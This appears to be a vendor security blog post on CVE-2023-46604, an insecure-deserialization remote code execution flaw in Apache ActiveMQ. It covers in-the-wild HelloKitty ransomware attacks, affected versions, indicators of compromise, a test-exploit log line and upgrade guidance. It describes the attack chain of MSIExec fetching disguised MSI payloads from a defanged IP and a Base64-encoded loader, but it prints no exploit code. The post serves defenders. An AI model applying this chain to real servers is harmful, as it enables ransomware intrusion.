A suspected exploitation of CVE-2023-46604 in Apache ActiveMQ has been identified in two different customer environments.
Here’s everything you need to know:
What is CVE-2023-46604?
CVE-2023-46604 is an instance of a Remote Code Execution (RCE) vulnerability found within Apache ActiveMQ. The flaw enables a remote attacker, who has network access to a broker, to execute arbitrary shell commands. They can achieve this by manipulating serialized class types in the OpenWire protocol, which in turn causes the broker to instantiate any class available on the classpath.
Despite its rather intricate description, the essential problem behind this vulnerability is related to insecure deserialization.
On October 25, 2023, the vulnerability was made public by Apache, and new versions of ActiveMQ were introduced. Both the proof-of-concept (PoC) exploit code and specific vulnerability details are now accessible to the public.
Based on the available evidence and the ransom note, the activity has been attributed to the HelloKitty ransomware family, after the family’s source code was leaked on a forum in early October 2023. Similar indicators of compromise across the affected customer environments which had been running on outdated versions of Apache ActiveMQ.
In case of successful exploitation of the vulnerability, Java.exe will host the specific Apache application under attack, specifically located at D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64. This specific location was identified as the parent process in both incidents. Following the exploitation, the adversary made efforts to execute remote binaries with the names M2.png and M4.png using MSIExec. The threat actor’s endeavors to deploy ransomware were characterized by a lack of finesse, as one of the incidents monitored among unsuccessful attempts to encrypt assets.
What is HelloKitty Ransomware in this context?
The researchers obtained the MSI files M4.png and M2.png from the domain 172.245.16[.]125 and performed an analysis within a controlled environment. Upon examination, it was observed that both MSI files contained an internally named 32-bit .NET executable called dllloader. Within this .NET executable, there was evidence of loading a Base64-encoded payload. After decoding the Base64-encoded payload, it was revealed to be a 32-bit .NET DLL labeled EncDLL.
The EncDLL binary displayed functionality akin to ransomware, as it exhibited behavior involving the identification and termination of specific processes. Our team also observed that the DLL was capable of encrypting files with specific extensions using the RSACryptoServiceProvider function, appending the encrypted files with the .locked extension. Additionally, there was another function in place to specify which directories should be excluded from encryption, a static variable containing the ransomware note, and a function that attempted communication with an HTTP server at the address 172.245.16[.]125.
The ransomware note indicated that communication should be established through the email address service@hellokittycat[.]online.
Does CVE-2023-46604 affect me?
According to Apache’s advisory, CVE-2023-46604 affects the following versions of ActiveMQ:
Apache ActiveMQ 5.18.0 before 5.18.3
Apache ActiveMQ 5.17.0 before 5.17.6
Apache ActiveMQ 5.16.0 before 5.16.7
Apache ActiveMQ before 5.15.16
Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
Has CVE-2023-46604 been actively exploited in the wild?
Forensic evidence indicates that the exploitation of CVE-2023-46604 had already been spotted in the wild as by Arctic Wolf Labs as early as October 10, 2023, well before the CVE was disclosed or any proof-of-concept exploitation code became available. Following the successful exploitation of CVE-2023-46604, there were instances of 45.32.120[.]181 deploying SparkRAT[2]. Furthermore, more recently, two distinct ransomware campaigns were detected, both utilizing this vulnerability to gain initial access. These campaigns originated from the IP address 172.245.16[.]125, which was also observed delivering additional payloads as part of the ransomware attacks.
Rapid7’s vulnerability research team has analyzed CVE-2023-46604 and made available a public exploit code. In their test setup, activemq.log had a single line entry for successful exploitation of CVE-2023-46604. Below is the researcher’s (“attacker’s”) exploit, with their IP being 192.168.86.35, with the target TCP port 61616:
2023-10-31 05:04:58,736 | WARN | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616
The Rapid7 vulnerability research team has taken the public proof-of-concept and verified that the observed behavior in customer environments aligns with what we would anticipate from the exploitation of CVE-2023-46604. In-depth technical analysis of this vulnerability by Rapid7 research is available on AttackerKB.
How to fix CVE-2023-46604
To mitigate the vulnerability, organizations should promptly upgrade to an updated version of ActiveMQ. Users of Apache ActiveMQ are advised to update to the latest version to successfully remediate this issue:
- 5.17.6
- 5.18.3
- 5.16.7
- 5.15.16
Additionally, admins should conduct an assessment of their environments to identify any potential indicators of compromise. The required updates provided by Apache are available in the above-mentioned link, and for enhancing the security of ActiveMQ implementations, see Apache’s valuable information.
Rapid7 has advised its customers alongside MDR, InsightIDR, and Managed Threat Complete (MTC’s) customers, to ensure that the Insight Agent is installed on all relevant assets within their environments to maximize security and threat detection capabilities.
In an effort to develop and implement detections for managed risk, managed detection, and response customers, the intelligence collected by Arctic Wolf has been made available in their full report, covering observed active exploitations in the wild, binary analysis of the ransomware payload , IP address, domains, and the bitcoin wallet address observed within the TellYouThePass ransomware variant.
Next steps
Each new vulnerability is a reminder of where we stand, and what we need to do better. Check out the following resources to help you maintain cyber hygiene and stay ahead of the threat actors:
- Can you trust ChatGPT’s package recommendations?
- MITRE ATTACK framework – Mapping techniques to CVEs
- Exploit maturity: an introduction
- OWASP Top 10 vulnerabilities 2022: what we learned
- How to fix CVE-2023-32784 in KeePass password manager
And finally…
Don’t get found out by new vulnerabilities. Vulcan Cyber gives you full visibility and oversight of your threat environment and lets you prioritize, remediate and communicate your cyber risk across your entire organization. Get a demo today.
